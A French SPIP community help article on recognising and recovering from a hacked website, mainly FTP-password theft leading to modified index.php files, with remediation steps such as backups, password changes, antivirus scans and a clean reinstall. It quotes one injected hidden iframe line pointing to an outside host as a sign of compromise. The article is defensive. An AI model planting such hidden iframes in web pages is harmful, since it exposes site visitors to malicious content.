Votre site est "hacké" !

Tout webmestre constate, un jour ou l’autre, une attaque de son site, avec -en cas de piratage réussi- des résultats et conséquences variables, par exemple que son hébergeur "blackliste" le site ou le ferme...

Article publié le 18 mai 2013, et actualisé en mars 2017

Installation de plugin

Remonter à la Rubrique

Mes images me jouent

Site attaqué ?

Cela n’arrive pas qu’aux autres ; et meme si vous suivez régulièrement les mises-à-jour de sécurité [1], les hackers peuvent frapper : exemple !

Il semble -d’après les analyses de Logs- que ce soit souvent la simple récupération du mot de passe FTP (par un virus, type Gumblar) qui facilite (évidemment) le parasitage [2].

Pour vérifier votre site, b_b signale un outil d’exploration en-ligne
https://www.unmaskparasites.com/, auquel il suffit d’indiquer une home page.
_Fil_ a trouvé un outil de controle des php..

Ci-dessous par exemple, une information publiée sur la liste
qui est arrivé sur un site SPIP. [3] :
À l’identification dans la partie privée

Affichage du message suivant :
Vous êtes enregistré... par ici...

Puis :
problème de cookie
Pour vous identifier de façon sûre sur ce site, vous devez accepter les cookies. Veuillez régler votre navigateur pour qu’il les accepte (au moins pour ce site).

Ce problème semble survenir de temps à autre depuis plusieurs années - cf. les forums et autres recherches sur Google (entre autres). [4]

Pour faire simple :

Premier réflexe = regarder (par FTP) le contenu de : index.php
[5] et spip.php à la racine !
Cela pour s’apercevoir si/que le contenu a été modifié, selon l’hypothèse ci-dessus !!

Genre : ajout de code comme :
<iframe src=https://www.kentobike.it/tmp/stata6.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>
[6]

En clair, le site a subi une "attaque" par FTP, suite soit à une malveillance ou une autre bizarrerie qu’on ne comprend pas forcément trop.
Et cela pour rajouter des trucs super cra cra beurk...

Actions

commencer par une copie FTP des sources et des logs vers un poste en local (pour analyse ultérieure), et une sauvegarde ./IMG/ et BDD Sauvegarder sa base de données SPIP [7].
Vérifier tous les fichiers index.html et index.php du site
Changement de tous les codes FTP d’accès au serveur d’hébergement et mise en place de mots de passe beaucoup plus complexes (exemple : pierre4897 ? ben c’est pas une super idée...rajoutez des caractères spéciaux, par exemple)
passez toutes les machines ayant accès au FTP [8] à un anti-virus
Réinstallation d’une version de SPIP générique provenant de spip.net en remplacement de l’ancienne : vous pouvez vous inspirer des procédures de Mettre SPIP à jour : comment ?.
Vérification des fichiers en .html ou .php de protection du dossier IMG

Il est toutefois possible que cette perturbation vienne d’une compromission du serveur, auquel cas SPIP n’y peut pas grand’chose ! [9]...

Merci de nous signaler les coquilles, imprécisions ou erreurs qui figureraient dans cette page.

[1] La préoccupation sécurité chez SPIP n’est pas un vain mot : ecran de sécurité pour filtrer certaines attaques XSS, suivi régulier, et l’un des meilleurs scores au hit-parade du Certa ..

[2] Il faut changer de mot de passe pour tous les comptes ftp qui ont accès à ce site et lancer une analyse antivirus sur toutes les machines qui avaient un accès ftp au site.

[3] Merci a Bernard, alias Tonton BP, d’avoir volontiers participé à la publication de cet information d’avertissement.

[4] Deux causes possibles :
un problème complexe de plugins, donc tenter de régénérer son cookie de connexion en désactivant/renommant par FTP le dossier ./plugins le temps de se reconnecter, sinon réinstallation d’une version générique (et propre) de SPIP.
Et tout va bien et reprend son cours, jusqu’à ce que cela recommence une semaine après...
ou bien un site hacké : retour au sujet de cette page !

[5] Le contenu de ce fichier est des plus simple !!

[6] L’URL n’est pas la cause : ainsi www.kentobike.it n’est pas en cause - j’ai eu aussi marcodenicolais.it (par exemple)...

[7] Si possible sans lancer d’application php : préserver les fichiers logs...

[8] Des fois qu’un keylogger ou autre pirate ait simplement récupéré votre mot de passe de connexion ..

[9] C’est arrivé sur ce serveur en 2012, un logiciel du système d’exploitation présentait une faille Zero day !!

Article publié le 18 mai 2013, et actualisé en mars 2017 .

Répondre à cet article

Des réactions

13 juin 2017
Extensions en Metas

A noter également, outre les configurations simplifiées dans SPIP 3, un autre dispositif de SPIP (...)

» forum

19 mai 2015
sur les Mots-clés

Bonjour, Merci pour cet article. un suggestion d’amélioration cette astuce ne vous affichera (...)

» forum

Réactions (suite)

1er mars 2012
Squelettes généralistes complets

En passant, il y a un souci de configuration pour ajouter un commentaire (notamment, mais pas (...)

» forum

24 janvier 2012
Architecture d’une boucle

J’espère qu’il t’arrivera d’autres "atrocités" d’un même genre ! ;)

» forum

24 janvier 2012
Une chose affreuse m’arrive... ;-)

Je commence à comprendre ce qu’est une boucle... Ah c’était déjà expliqué ailleurs ? Bin... (...)

» forum

20 septembre 2011
Installer mon premier SPIP

Merci pour ce tutoriel efficace et clair J’avais passé quelques heures en essayant d’utiliser (...)

» forum

Avertissement !

Avertissement au lecteur

Le contenu du site est toujours à améliorer !

Nous intervenons souvent, non plus quotidiennement, mais régulièrement pour relancer et compléter SPN : répondre à vos questions, des rédactions à corriger, rajouter un mot-clé explicatif ou une note d'informations, des illustrations à ajouter. suivre l'actualité de SPIP..

Merci d'avance de votre lecture (attentive, et remarques bienvenues) :

à bientot !

Votre site est "hacké" !

Site attaqué ?

Pour faire simple :

Actions

Contactez nous !

Des réactions

Réactions (suite)

Avertissement !